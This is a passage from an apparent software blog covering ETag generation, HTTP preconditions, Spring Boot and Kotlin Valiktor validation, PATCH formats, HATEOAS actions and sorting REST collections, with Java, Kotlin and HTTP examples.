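import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

/** Sketch: derives a strong ETag from id, media type and revision (hypothetical helper). */
final class ETagGenerator {

    static String strongETag(String resourceId, String mediaType, long revision) {
        // The separator avoids accidental collisions like ("1", "23") vs. ("12", "3")
        String input = resourceId + "|" + mediaType + "|" + revision;
        try {
            MessageDigest digest = MessageDigest.getInstance("SHA-256");
            byte[] hash = digest.digest(input.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : hash) {
                hex.append(String.format("%02x", b));
            }
            // ETags must be placed within double quotes
            return "\"" + hex + "\"";
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 is not available", e);
        }
    }
}
```

Because the media type is part of the hash input, the JSON and XML representations of the same resource revision get different ETags. To validate an update request we only need the current revision number and do not have to serialize the resource again.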

HTTP status codes and execution order

When working with preconditions, two HTTP status codes are relevant:

412 - Precondition failed indicates that one or more preconditions evaluated to false on the server (e.g. because the resource state has been changed on the server)
428 - Precondition required has been added in RFC 6585 and indicates that the server requires the request to be conditional. The server should return this status code if an update request does not contain the expected preconditions

RFC 7232 also defines the evaluation order for HTTP 412 (Precondition failed):

[..] a recipient cache or origin server MUST evaluate received request preconditions after it has successfully performed its normal request checks and just before it would perform the action associated with the request method. A server MUST ignore all received preconditions if its response to the same request without those conditions would have been a status code other than a 2xx (Successful) or 412 (Precondition Failed). In other words, redirects and failures take precedence over the evaluation of preconditions in conditional requests.

This usually results in the following processing order of an update request:

Before evaluating preconditions, we check if the request fulfills all other requirements. When this is not the case, we respond with a standard 4xx status code. This way we make sure that other errors are not suppressed by the 412 status code.
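The following Java sketch illustrates one possible ordering. The concrete checks (authorization, existence, body validation), their order and the class name UpdateRequestCheck are assumptions for this example. The sketch also simplifies If-Match handling to a literal comparison with a single ETag.

```java
/** Sketch: decides the response status of a conditional update request (hypothetical helper). */
final class UpdateRequestCheck {

    static int status(boolean authorized, boolean resourceExists, boolean bodyValid,
                      String ifMatch, String currentETag) {
        // 1. Normal request checks come first, so their errors are never hidden by a 412
        if (!authorized) {
            return 403;
        }
        if (!resourceExists) {
            return 404;
        }
        if (!bodyValid) {
            return 400;
        }
        // 2. The server requires the request to be conditional
        if (ifMatch == null) {
            return 428;
        }
        // 3. The precondition is evaluated just before the update would be performed
        if (!ifMatch.equals(currentETag)) {
            return 412;
        }
        // 4. All checks passed, the update can be applied
        return 204;
    }
}
```

A request with an outdated ETag and an invalid body results in 400 here, not in 412, because the body validation runs before the precondition is evaluated.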

Interested in more REST related articles? Have a look at my REST API design page.

Validation in Spring Boot applications

2021-02-02T23:09:43Z

Validation in Spring Boot applications can be done in many different ways. Depending on your requirements some ways might fit your application better than others. In this post we will explore the usual options to validate data in Spring Boot applications.

Validation is done by using the Bean Validation API. The reference implementation for the Bean Validation API is Hibernate Validator.

All required dependencies are packaged in the Spring Boot starter POM spring-boot-starter-validation. So usually all you need to get started is the following dependency:


<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-validation</artifactId>
</dependency>

Validation constraints are defined by annotating fields with appropriate Bean Validation annotations. For example:


public class Address {

    @NotBlank
    @Size(max = 50)
    private String street;

    @NotBlank
    @Size(max = 50)
    private String city;

    @NotBlank
    @Size(max = 10)
    private String zipCode;
    
    @NotBlank
    @Size(max = 3)
    private String countryCode;

    // getters + setters
}

I think these annotations are quite self-explanatory. We will use this Address class in many of the following examples.

You can find a complete list of built-in constraint annotations in the Bean Validation documentation. Of course you can also define your own validation constraints by creating a custom ConstraintValidator.

Defining validation constraints is only one part. Next we need to trigger the actual validation. This can be done by Spring or by manually invoking a Validator. We will see both approaches in the next sections.

Validating incoming request data

When building a REST API with Spring Boot it is likely you want to validate incoming request data. This can be done by simply adding the @Valid annotation to the @RequestBody method parameter. For example:


@RestController
public class AddressController {

    @PostMapping("/address")
    public void createAddress(@Valid @RequestBody Address address) {
        // ..
    }
}

Spring now automatically validates the passed Address object based on the previously defined constraints.

This type of validation is usually used to make sure the data sent by the client is syntactically correct. If the validation fails the controller method is not called and an HTTP 400 (Bad request) response is returned to the client. More complex business specific validation constraints should typically be checked later in the business layer.

Persistence layer validation

When using a relational database in your Spring Boot application, it is likely that you are also using Spring Data and Hibernate. Hibernate comes with support for Bean Validation. If your entities contain Bean Validation annotations, those are automatically checked when persisting an entity.

Note that the persistence layer should definitely not be the only location for validation. If validation fails here, it usually means that some sort of validation is missing in other application components. Persistence layer validation should be seen as the last line of defense. In addition to that, the persistence layer is usually too late for business related validation.

Method parameter validation

Another option is the method parameter validation provided by Spring. This allows us to add Bean Validation annotations to method parameters. Spring then uses an AOP interceptor to validate the parameters before the actual method is called.

For example:


@Service
@Validated
public class CustomerService {

    public void updateAddress(
            @Pattern(regexp = "\\w{2}\\d{8}") String customerId,
            @Valid Address newAddress
    ) {
        // ..
    }
}

This approach can be useful to validate data coming into your service layer. However, before committing to this approach you should be aware of its limitations as this type of validation only works if Spring proxies are involved. See my separate post about Method parameter validation for more details.

Note that this approach can make unit testing harder. In order to test validation constraints in your services you now have to bootstrap a Spring application context.

Triggering Bean Validation programmatically

In the previous validation solutions the actual validation is triggered by Spring or Hibernate. However, it can be quite viable to trigger validation manually. This gives us great flexibility in integrating validation into the appropriate location of our application.

We start by creating a ValidationFacade bean:


@Component
public class ValidationFacade {

    private final Validator validator;

    public ValidationFacade(Validator validator) {
        this.validator = validator;
    }

    public <T> void validate(T object, Class<?>... groups) {
        Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
        if (!violations.isEmpty()) {
            throw new ConstraintViolationException(violations);
        }
    }
}

This bean accepts a Validator as constructor parameter. Validator is part of the Bean Validation API and responsible for validating Java objects. An instance of Validator is automatically provided by Spring, so it can be injected into our ValidationFacade.

Within the validate(..) method we use the Validator to validate a passed object. The result is a Set of ConstraintViolations. If no validation constraints are violated (= the object is valid) the Set is empty. Otherwise, we throw a ConstraintViolationException.

We can now inject our ValidationFacade into other beans. For example:


@Service
public class CustomerService {

    private final ValidationFacade validationFacade;

    public CustomerService(ValidationFacade validationFacade) {
        this.validationFacade = validationFacade;
    }

    public void updateAddress(String customerId, Address newAddress) {
        validationFacade.validate(newAddress);
        // ...
    }
}

To validate an object (here newAddress) we simply have to call the validate(..) method of ValidationFacade. Of course we could also inject the Validator directly in our CustomerService. However, in case of validation errors we usually do not want to deal with the returned Set of ConstraintViolations. Instead it is likely we simply want to throw an exception, which is exactly what ValidationFacade is doing.

Often this is a good approach for validation in the service/business layer. It is not limited to method parameters and can be used with different types of objects. For example, we can load an object from the database, modify it and then validate it before we continue.

This approach is also easy to unit test as we can simply mock ValidationFacade. In case we want real validation in unit tests, the required Validator instance can be created manually (as shown in the next section). Neither case requires bootstrapping a Spring application context in our tests.

Validating inside business classes

Another approach is to move validation inside your actual business classes. When doing Domain Driven Design this can be a good fit. For example, when creating an Address instance the constructor can make sure we are not able to construct an invalid object:


public class Address {

    @NotBlank
    @Size(max = 50)
    private String street;

    @NotBlank
    @Size(max = 50)
    private String city;

    ...
    
    public Address(String street, String city) {
        this.street = street;
        this.city = city;
        ValidationHelper.validate(this);
    }
}

Here the constructor calls a static validate(..) method to validate the object state. This static validate(..) method looks similar to the previously shown method in ValidationFacade:


public class ValidationHelper {

    private static final Validator validator = Validation.buildDefaultValidatorFactory().getValidator();

    public static <T> void validate(T object, Class<?>... groups) {
        Set<ConstraintViolation<T>> violations = validator.validate(object, groups);
        if (!violations.isEmpty()) {
            throw new ConstraintViolationException(violations);
        }
    }
}

The difference here is that we do not retrieve the Validator instance from Spring. Instead, we create it manually by using:


Validation.buildDefaultValidatorFactory().getValidator()

This way we can integrate validation directly into domain objects without relying on someone outside to validate the object.

Summary

We saw different ways to deal with validation in Spring Boot applications. Validating incoming request data is good to reject nonsense as early as possible. Persistence layer validation should only be used as an additional layer of safety. Method validation can be quite useful, but make sure you understand the limitations. Even if triggering Bean Validation programmatically takes a bit more effort, it is usually the most flexible way.

You can find the source code for the shown examples on GitHub.

REST: Partial updates with PATCH

2021-01-17T21:14:32Z

In previous posts we learned how to update/replace resources using the HTTP PUT operation. We also learned about the differences between POST, PUT and PATCH. In this post we will now see how to perform partial updates with the HTTP PATCH method.

Before we start, let's quickly check why partial updates can be useful:

Simplicity - If a client only wants to update a single field, a partial update request can be simpler to implement.
Bandwidth - If your resource representations are quite large, partial updates can reduce the amount of bandwidth required.
Lost updates - Resource replacements with PUT can be susceptible to the lost update problem. While partial updates do not solve this problem, they can help reduce the number of possible conflicts.

The PATCH HTTP method

Unlike PUT or POST, the PATCH method is not part of the original HTTP RFC. It was added later via RFC 5789. The PATCH method is neither safe nor idempotent. However, PATCH is often used in an idempotent way.

A PATCH request can contain one or more requested changes to a resource. If more than one change is requested the server must ensure that all changes are applied atomically. The RFC says:

The server MUST apply the entire set of changes atomically and never provide ([..]) a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.

The request body for PATCH is quite flexible. The RFC only says the request body has to contain instructions on how the resource should be modified:

With PATCH, [..], the enclosed entity contains a set of instructions describing how a resource currently residing on the origin server should be modified to produce a new version.

This means we do not have to use the same resource representation for PATCH requests as we might use for PUT or GET requests. We can use a completely different Media-Type to describe the resource changes.

PATCH can be used in two common ways which both have their own pros and cons. We will look into both of them in the next sections.

Using the standard resource representation to send changes (JSON Merge Patch)

The most intuitive way to use PATCH is to keep the standard resource representation that is used in GET or PUT requests. However, with PATCH we only include the fields that should be changed.

Assume we have a simple product resource. The response of a simple GET request might look like this:


GET /products/123


{
    "name": "Cool Gadget",
    "description": "It looks very cool",
    "price": 4.50,
    "dimension": {
        "width": 1.3,
        "height": 2.52,
        "depth": 0.9
    },
    "tags": ["cool", "cheap", "gadget"]
}

Now we want to increase the price, remove the cheap tag and update the product width. To accomplish this, we can use the following PATCH request:


PATCH /products/123
{
    "price": 6.20,
    "dimension": {
        "width": 1.35
    },
    "tags": ["cool", "gadget"]
}

Fields not included in the request should stay unmodified. In order to remove an element from the tags array we have to include all remaining array elements.

This usage of PATCH is called JSON Merge Patch and is defined in RFC 7396. You can think of it as a PUT request that only uses a subset of fields. Patching this way usually makes PATCH requests idempotent.

JSON Merge Patch and null values

There is one caveat with JSON Merge Patch you should be aware of: The processing of null values.

Assume we want to remove the description of the previously used product resource. The PATCH request looks like this:


PATCH /products/123
{
    "description": null
}

To fulfill the client's intent the server has to differentiate between the following situations:

The description field is not part of the JSON document. In this case, the description should stay unmodified.
The description field is part of the JSON document and has the value null. Here, the server should remove the current description.

Be aware of this differentiation when using JSON libraries that map JSON documents to objects. In strongly typed programming languages like Java it is likely that both cases produce the same result when mapped to a strongly typed object (the description field might result in being null in both cases).

So, when supporting null values, you should make sure you can handle both situations.
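One way to keep both situations apart is to work on a generic structure before mapping to typed objects. The following Java sketch follows the merge algorithm described in RFC 7396 and assumes that the JSON documents have already been parsed into nested Map values (for example by a JSON library). The class name MergePatch is made up for this illustration.

```java
import java.util.LinkedHashMap;
import java.util.Map;

/** Sketch of the JSON Merge Patch algorithm on already parsed JSON (hypothetical helper). */
final class MergePatch {

    @SuppressWarnings("unchecked")
    static Object apply(Object target, Object patch) {
        if (!(patch instanceof Map)) {
            // Scalars and arrays replace the current value completely
            return patch;
        }
        // Work on a copy so the original document stays untouched
        Map<String, Object> result = target instanceof Map
                ? new LinkedHashMap<>((Map<String, Object>) target)
                : new LinkedHashMap<>();

        for (Map.Entry<String, Object> entry : ((Map<String, Object>) patch).entrySet()) {
            if (entry.getValue() == null) {
                // Field is present with value null: remove it
                result.remove(entry.getKey());
            } else {
                // Field is present with a value: merge recursively
                result.put(entry.getKey(), apply(result.get(entry.getKey()), entry.getValue()));
            }
        }
        // Fields that are not part of the patch are never visited and stay unmodified
        return result;
    }
}
```

A Map keeps the distinction we need: a key that is missing in the patch is simply not visited, while a key that maps to null triggers the removal.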

Using a separate Patch format

As mentioned earlier it is fine to use a different media type for PATCH requests.

Again we want to increase the price, remove the cheap tag and update the product width. A different way to accomplish this might look like this:


PATCH /products/123
{
    "$.price": {
        "action": "replace",
        "newValue": 6.20
    },
    "$.dimension.width": {        
        "action": "replace",
        "newValue": 1.35
    },
    "$.tags[?(@ == 'cheap')]": {
        "action": "remove"
    }
}

Here we use JSONPath expressions to select the values we want to change. For each selected value we then use a small JSON object to describe the desired action.

To replace simple values this format is quite verbose. However, it also has some advantages, especially when working with arrays. As shown in the example we can remove an array element without sending all remaining array elements. This can be useful when working with large arrays.

JSON Patch

A standardized media type to describe changes using JSON is JSON Patch (described in RFC 6902). With JSON Patch our request looks like this:


PATCH /products/123
Content-Type: application/json-patch+json

[
    { 
        "op": "replace", 
        "path": "/price", 
        "value": 6.20
    },
    {
        "op": "replace",
        "path": "/dimension/width",
        "value": 1.35
    },
    {
        "op": "remove", 
        "path": "/tags/1"
    }
]

This looks a bit similar to our previous solution. JSON Patch uses the op element to describe the desired action. The path element contains a JSON Pointer (yet another RFC) to select the element to which the change should be applied.

Note that the current version of JSON Patch does not support removing an array element by value. Instead, we have to remove the element using the array index. With /tags/1 we can select the second array element.
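To illustrate how the path is resolved, here is a small Java sketch that applies a single replace or remove operation to a document that has already been parsed into nested Map and List values. It is not a complete JSON Patch implementation: the other operations and the required atomicity are left out, and the class name JsonPatchSketch is made up for this example.

```java
import java.util.List;
import java.util.Map;

/** Sketch: applies one "replace" or "remove" operation in place (hypothetical helper). */
final class JsonPatchSketch {

    @SuppressWarnings("unchecked")
    static void apply(Object document, String op, String path, Object value) {
        boolean remove = "remove".equals(op);
        if (!remove && !"replace".equals(op)) {
            throw new IllegalArgumentException("Unsupported operation: " + op);
        }
        if (!path.startsWith("/")) {
            throw new IllegalArgumentException("Unsupported path: " + path);
        }
        // Walk down to the parent of the element selected by the JSON Pointer
        String[] tokens = path.substring(1).split("/", -1);
        Object parent = document;
        for (int i = 0; i < tokens.length - 1; i++) {
            parent = resolve(parent, unescape(tokens[i]));
        }
        String last = unescape(tokens[tokens.length - 1]);

        if (parent instanceof List) {
            List<Object> list = (List<Object>) parent;
            int index = Integer.parseInt(last); // array elements are selected by index
            if (index < 0 || index >= list.size()) {
                throw new IllegalArgumentException("Path does not exist: " + path);
            }
            if (remove) {
                list.remove(index);
            } else {
                list.set(index, value);
            }
        } else if (parent instanceof Map && ((Map<String, Object>) parent).containsKey(last)) {
            Map<String, Object> map = (Map<String, Object>) parent;
            if (remove) {
                map.remove(last);
            } else {
                map.put(last, value);
            }
        } else {
            throw new IllegalArgumentException("Path does not exist: " + path);
        }
    }

    private static Object resolve(Object node, String token) {
        if (node instanceof List) {
            return ((List<?>) node).get(Integer.parseInt(token));
        }
        if (node instanceof Map && ((Map<?, ?>) node).containsKey(token)) {
            return ((Map<?, ?>) node).get(token);
        }
        throw new IllegalArgumentException("Path segment does not exist: " + token);
    }

    /** JSON Pointer escapes: ~1 stands for "/" and ~0 stands for "~". */
    private static String unescape(String token) {
        return token.replace("~1", "/").replace("~0", "~");
    }
}
```

Note that the remove operation depends on the current order of the array. If another client changed the tags in the meantime, /tags/1 might select a different element.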

Before using JSON Patch, you should evaluate if it fulfills your needs and if you are fine with its limitations. In the issues of the GitHub repository json-patch2 you can find a discussion about a possible revision of JSON Patch.

If you are using XML instead of JSON you should have a look at XML Patch (RFC 5261) which works similarly, but uses XML.

The Accept-Patch header

The RFC for HTTP PATCH also defines a new response header for HTTP OPTIONS requests: Accept-Patch. With Accept-Patch the server can communicate which media types are supported by the PATCH operation for a given resource. The RFC says:

Accept-Patch SHOULD appear in the OPTIONS response for any resource that supports the use of the PATCH method.

An example HTTP OPTIONS request/response for a resource that supports the PATCH method and uses JSON Patch might look like this:

Request:


OPTIONS /products/123

Response:


HTTP/1.1 200 OK
Allow: GET, PUT, POST, OPTIONS, HEAD, DELETE, PATCH
Accept-Patch: application/json-patch+json

Responses to HTTP PATCH operations

The PATCH RFC does not mandate how the response body of a PATCH operation should look. It is fine to return the updated resource. It is also fine to leave the response body empty.

The server usually responds to HTTP PATCH requests with one of the following HTTP status codes:

204 (No Content) - Indicates that the operation has been completed successfully and no data is returned
200 (Ok) - The operation has been completed successfully and the response body contains more information (for example the updated resource).
400 (Bad request) - The request body is malformed and cannot be processed.
409 (Conflict) - The request is syntactically valid but cannot be applied to the resource. For example it can be used with JSON Patch if the element selected by a JSON pointer (the path field) does not exist.

Summary

The PATCH operation is quite flexible and can be used in different ways. JSON Merge Patch uses standard resource representations to perform partial updates. JSON Patch however uses a separate PATCH format to describe the desired changes. It is also fine to come up with a custom PATCH format. Resources that support the PATCH operation should return the Accept-Patch header for OPTIONS requests.

HATEOAS without links

2020-12-01T12:50:13Z

Yes, I know this title sounds stupid, but I could not find something that fits better. So let me explain why I think that links in HATEOAS APIs are not always that useful.

If you don't know what HATEOAS is, I recommend reading my Introduction to Hypermedia REST APIs first.

REST APIs with HATEOAS support provide two main features for decoupling client and server:

Hypermedia removes the need for the client to hard-code and construct URIs. This helps the server to evolve the REST-API in the future.
The availability of links tells the client which operations can be performed on a resource. This avoids duplicating server logic on the client.
For example, assume the client needs to decide if a payment button should be displayed next to an order. The logic for this might be:
```

if (order.status == OPEN and order.paymentDate == null) {
    show payment button
}
```
With HATEOAS the client does not need to know this logic. The check simply becomes:
```

if (order.links.getByRel("payment") != null) {
    show payment button
}
```
The server can now change the rule that decides when an order can be paid without requiring a client update.

How useful these features are depends on your application, your system architecture and your clients.

The second point might not be a big deal for applications that mostly use CRUD operations. However, it can be very useful if your REST API is serving a more complex domain.

The first point depends on your clients and to a certain degree on your overall system architecture. If you provide an API for public clients it is very likely that at least some clients will hard-code request URIs and not use the links you provide. In this case, you lose the ability to evolve your API without breaking (at least some) clients.

If your clients do not use your API responses directly and instead expose their own API it is also unlikely that they will follow the links you return. For example, this can easily happen when using the Backend for Frontend pattern.

Consider the following example system architecture:

A Backend Service is used by two other systems. Both systems provide user-interfaces which communicate with system specific backends. REST is used for all communication.

Assume a user performs an action using the Android-App (1). The App sends a request to the Mobile-Backend (2). Then, the Mobile-Backend might communicate with the Backend-Service (3) to perform the requested action. The Mobile-Backend can also pre-process, map or aggregate data retrieved from the Backend-Service before sending a response back to the Android-App.

Now back to HATEOAS.

If the Backend-Service (3) in this example architecture provides a Hypermedia REST API, clients can barely make use of HATEOAS related links.

Let's look at a sequence diagram showing the system communication to see the problem:

The Backend-Service (3) provides an API-Entrypoint which returns a list of all available operations with their request URIs. The Mobile-Backend (2) sends a request to this API-Entrypoint in regular intervals and caches the link list locally.

Now assume a user of the Android-App (1) wants to access a specific order. To retrieve the required information the Android-App sends a request to the Mobile-Backend (2). The URI for this request might have been retrieved from the Mobile-Backend's API-Entrypoint previously (not shown).

To retrieve the requested order from the Backend-Service the Mobile-Backend uses the order-details link from the cached link list. The Backend-Service returns a response with HATEOAS links. Here, the order-payment link indicates that the order can be paid. The Mobile-Backend now transforms the response to its own return format and sends it back to the Android-App.

The Mobile-Backend might also return a HATEOAS response. So link URIs from the Backend-Service need to be mapped to the appropriate Mobile-Backend URIs. Therefore the Mobile-Backend checks if an order-payment link is present in the Backend-Service response. If this is the case it adds an order-payment link to its own response.

Note the Mobile-Backend is only using the relations (rel fields) of the Backend-Service response. The URIs are discarded.

Now the user wants to pay the order. The Android-App uses the previously retrieved order-payment link to send a request to the Mobile-Backend. The Mobile-Backend has now lost the context of the previous Backend-Service response. So it has to look up the order-payment link in the cached link list. The process continues in the same way as the previous request.

In this example the Android-App is able to make use of HATEOAS related links. However, the Mobile-Backend cannot use the link URIs returned by Backend-Service responses (except for the API entry-point). If the Mobile-Backend is providing HATEOAS features the link relations from the Backend-Service might be useful. The URIs for Backend-Service requests are always looked up from the cached API-Entrypoint response.

Communicate actions instead of links

Unfortunately link construction is not always that simple and can take some extra time. This time is wasted if you know that your clients won't use these links.

Probably the easiest way to avoid logic duplication on the client is to ignore links and use a simple actions array in REST responses:


GET /orders/123
{
    "id": 123,
    "price": "$41.24 USD",
    "status": "open",
    "paymentDate": null,
    "items": [
        ...
    ],
    "actions": ["order-cancel", "order-payment", "order-update"]
}

This way we can communicate possible actions without the need of constructing links. In this case the response tells us that the client is able to perform cancel, payment and update operations.

Note that this might not even increase coupling between the client and the server. Clients can still look up URIs for those actions in the API entry point without the need of hard-coding URIs.
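On the client side this lookup could be sketched in Java as follows. The class name ActionResolver, the shape of the cached entry point (a map from action name to URI template) and the {id} placeholder are assumptions made for this example.

```java
import java.util.List;
import java.util.Map;
import java.util.Optional;

/** Sketch: resolves request URIs for actions via the cached API entry point (hypothetical). */
final class ActionResolver {

    // Action name -> URI template, as retrieved from the API entry point
    private final Map<String, String> entryPointLinks;

    ActionResolver(Map<String, String> entryPointLinks) {
        this.entryPointLinks = entryPointLinks;
    }

    /** Returns the request URI if the response lists the action, otherwise an empty Optional. */
    Optional<String> uriFor(String action, List<String> availableActions, String orderId) {
        if (!availableActions.contains(action)) {
            // The server did not offer this action for the current resource state
            return Optional.empty();
        }
        String template = entryPointLinks.get(action);
        if (template == null) {
            // The action is unknown to the cached entry point
            return Optional.empty();
        }
        return Optional.of(template.replace("{id}", orderId));
    }
}
```

The client decides whether to show the payment button by checking if uriFor("order-payment", ..) returns a value. It does not need to know the rule that decides when an order can be paid.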

An alternative is to use standard link elements and just skip the href attribute:


GET /orders/123
{
    "id": 123,
    "price": "$41.24 USD",
    "status": "open",
    "paymentDate": null,
    "items": [
        ...
    ],
    "links": [
        { "rel": "order-cancel" },
        { "rel": "order-payment" },
        { "rel": "order-update" }
    ]
}

However, it might be a bit confusing to return a links element without link URIs.

Obviously, you are leaving the standard path with both described ways. On the other side, if you don't need links you probably don't want to use a standardized HATEOAS response format (like HAL) either.

Validation in Kotlin: Valiktor

2020-11-19T12:42:51Z

Bean Validation is the Java standard for validation and can be used in Kotlin as well. However, there are also two popular alternative libraries for validation available in Kotlin: Konform and Valiktor. Both implement validation in a more Kotlin-like way without annotations. In this post we will look at Valiktor.

Getting started with Valiktor

First we need to add the Valiktor dependency to our project.

For Maven:


<dependency>
  <groupId>org.valiktor</groupId>
  <artifactId>valiktor-core</artifactId>
  <version>0.12.0</version>
</dependency>

For Gradle:


implementation 'org.valiktor:valiktor-core:0.12.0'

Now let's look at a simple example:


class Article(val title: String, val text: String) {
    init {
        validate(this) {
            validate(Article::text).hasSize(min = 10, max = 10000)
            validate(Article::title).isNotBlank()
        }
    }
}

Within the init block we call the validate(..) function to validate the Article object. validate(..) accepts two parameters: The object that should be validated and a validation function. In the validation function we define validation constraints for the Article class.

Now we try to create an invalid Article object with:


Article(title = "", text = "some article text")

This causes a ConstraintViolationException to be thrown because the title field is not allowed to be empty.

More validation constraints

Let's look at a few more example validation rules:


validate(this) {
    
    // Multiple constraints can be chained
    validate(Article::authorEmail)
            .isNotBlank()
            .isEmail()
            .endsWith("@cool-blog.com")

    // Nested validation
    // Checks that Article.category.name is not blank
    validate(Article::category).validate {
        validate(Category::name).isNotBlank()
    }

    // Collection validation
    // Checks that no Keyword in the keywords collection has a blank name
    validate(Article::keywords).validateForEach {
        validate(Keyword::name).isNotBlank()
    }

    // Conditional validation
    // if the article is published the permalink field cannot be blank
    if (isPublished) {
        validate(Article::permalink).isNotBlank()
    }
}

Validating objects from outside

In the previous examples the validation constraints are implemented within the object's init block. However, it is also possible to perform the validation outside the class.

For example:


val person = Person(name = "")

validate(person) {
    validate(Person::name).isNotBlank()
}

This validates the previously created Person object and causes a ConstraintViolationException to be thrown (because name is empty).

Creating a custom validation constraint

To define our own validation methods we need two things: An implementation of the Constraint interface and an extension method. The following snippet shows an example validation method to make sure an Iterable<T> does not contain duplicate elements:


object NoDuplicates : Constraint

fun <E, T> Validator<E>.Property<Iterable<T>?>.hasNoDuplicates()
        = this.validate(NoDuplicates) { iterable: Iterable<T>? ->

    if (iterable == null) {
        return@validate true
    }

    val list = iterable.toList()
    val set = list.toSet()
    set.size == list.size
}

This adds a method named hasNoDuplicates() to Validator<E>.Property<Iterable<T>?>. So this method can be called for fields of type Iterable<T>. The extension method is implemented by calling validate(..) with our Constraint and passing a validation function.

In the validation function we implement the actual validation. In this example we simply convert the Iterable to a List and then the List to a Set. If duplicate elements are present both collections have a different size (a Set does not contain duplicate elements).

We can now use our hasNoDuplicates() validation method like this:


class Article(val keywords: List<Keyword>) {
    init {
        validate(this) {
            validate(Article::keywords).hasNoDuplicates()
        }
    }
}

Conclusion

Valiktor is an interesting alternative for validation in Kotlin. It provides a fluent DSL to define validation rules. Those rules are defined in standard Kotlin code (and not via annotations) which makes it easy to add conditional logic. Valiktor comes with many predefined validation constraints. Custom constraints can easily be implemented using extension functions.

REST: Sorting collections

2020-11-06T12:24:46Z

When building a RESTful API we often want to give consumers the option to order collections in a specific way (e.g. ordering users by last name). If our API supports pagination this can be quite an important feature. When clients only query a specific part of a collection they are unable to order elements on the client.

Sorting is typically implemented via Query-Parameters. In the next section we look into common ways to sort collections and a few things we should consider.

Sorting by single fields

The easiest way is to allow sorting only by a single field. In this case, we just have to add two query parameters for the field and the sort direction to the request URI.

For example, we can sort a list of products by price using:


GET /products?sort=price&order=asc

asc and desc are usually used to indicate ascending and descending ordering.

We can reduce this to a single parameter by separating both values with a delimiter. For example:


GET /products?sort=price:asc

As we will see in the next section, this makes it easier for us to support sorting by more than one field.
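On the server side, the single-parameter variant needs a small amount of parsing. The following is a minimal sketch of how this could look in plain Java. The class SortExpression and its parse(..) method are hypothetical names chosen for this example and are not part of any framework. The sketch also assumes that a missing direction means ascending order.

```java
import java.util.Locale;

// Hypothetical helper (not part of any framework): parses a value like "price:asc".
final class SortExpression {

    enum Direction { ASC, DESC }

    final String field;
    final Direction direction;

    private SortExpression(String field, Direction direction) {
        this.field = field;
        this.direction = direction;
    }

    static SortExpression parse(String value) {
        // Limit -1 keeps trailing empty parts, so "price:" is rejected instead of silently accepted
        String[] parts = value.split(":", -1);
        if (parts.length > 2 || parts[0].trim().isEmpty()) {
            throw new IllegalArgumentException("Invalid sort expression: " + value);
        }
        String field = parts[0].trim();
        // Assumption: ascending order is used if no direction is given
        if (parts.length == 1) {
            return new SortExpression(field, Direction.ASC);
        }
        switch (parts[1].trim().toLowerCase(Locale.ROOT)) {
            case "asc":
                return new SortExpression(field, Direction.ASC);
            case "desc":
                return new SortExpression(field, Direction.DESC);
            default:
                throw new IllegalArgumentException("Invalid sort direction: " + parts[1]);
        }
    }
}
```

Calling SortExpression.parse("price:asc") yields the field price with direction ASC. Values with an unknown direction are rejected with an IllegalArgumentException, which an API would typically translate into a client error response.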

Sorting by multiple fields

To support sorting by multiple fields we can simply use the previous one-parameter way and separate fields by another delimiter. For example:


GET /products?sort=price:asc,name:desc

It is also possible to use the same parameter multiple times:


GET /products?sort=price:asc&sort=name:desc

Note that the meaning of a repeated query parameter is not explicitly defined by the HTTP and URI RFCs. However, it is supported by most web frameworks (see this discussion on Stack Overflow).
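Both styles can be handled by the same parsing code. The following sketch assumes that the web framework hands us all values of the sort parameter as a list of strings (one entry per occurrence of the parameter). MultiSortParser is a hypothetical name used for this example only. If a field is listed more than once, the sketch keeps the first occurrence, which is an arbitrary choice.

```java
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;

// Hypothetical helper: supports "sort=price:asc,name:desc" and "sort=price:asc&sort=name:desc".
final class MultiSortParser {

    // Returns field -> direction ("asc" or "desc") in the order requested by the client
    static Map<String, String> parse(List<String> sortValues) {
        Map<String, String> result = new LinkedHashMap<>();
        for (String value : sortValues) {
            for (String expression : value.split(",")) {
                String[] parts = expression.trim().split(":", 2);
                String field = parts[0].trim();
                if (field.isEmpty()) {
                    throw new IllegalArgumentException("Missing sort field in: " + value);
                }
                // Assumption: ascending order is used if no direction is given
                String direction = parts.length == 2
                        ? parts[1].trim().toLowerCase(Locale.ROOT)
                        : "asc";
                if (!direction.equals("asc") && !direction.equals("desc")) {
                    throw new IllegalArgumentException("Invalid sort direction in: " + expression);
                }
                // Assumption: the first occurrence of a field wins
                result.putIfAbsent(field, direction);
            }
        }
        return result;
    }
}
```

A LinkedHashMap is used here because the order of the sort fields matters: the first field is the primary sort criterion, the second one is only used to break ties.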

Checking sort parameters against a white list

Sort parameters should always be checked against a white list of sortable fields. If we pass sort parameters unchecked to the database, attackers can come up with requests like this:


GET /users?sort=password:asc

Admittedly, this might not be a real issue if passwords are correctly hashed, but you get the point. Even if the response does not contain the field we use for ordering, the order of the collection elements alone could lead to unintended data exposure.
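A white list check can be as simple as a lookup in a fixed set of field names. The following is a minimal sketch. The class name SortFieldWhitelist and the listed fields (lastName, firstName, createdAt) are assumptions made up for a hypothetical /users collection.

```java
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

// Hypothetical helper: only fields listed here may be used for sorting users.
final class SortFieldWhitelist {

    // Assumption: these are the sortable fields of an example /users collection
    private static final Set<String> SORTABLE_USER_FIELDS = Collections.unmodifiableSet(
            new HashSet<>(Arrays.asList("lastName", "firstName", "createdAt")));

    // Returns the field if it is sortable, otherwise rejects the request
    static String requireSortable(String field) {
        if (!SORTABLE_USER_FIELDS.contains(field)) {
            throw new IllegalArgumentException("Sorting by '" + field + "' is not supported");
        }
        return field;
    }
}
```

With this check in place, a request using sort=password:asc is rejected before the field name gets anywhere near a database query. Responding with HTTP 400 (Bad Request) would be a reasonable way to report this to the client.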

URI design suggestions

Avoid case sensitivity, use lower case letters

Prefer hyphens over spaces and underscores

Use hyphens over camel case

Avoid trailing slashes

Avoid media types and file formats in URIs

URIs describe resources not operations

Be consistent with plural and singular in resource names

Do not use query parameters to alter state

URIs are hierarchical

Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

Parsing YAML files with SnakeYAML

Mapping YAML content to objects

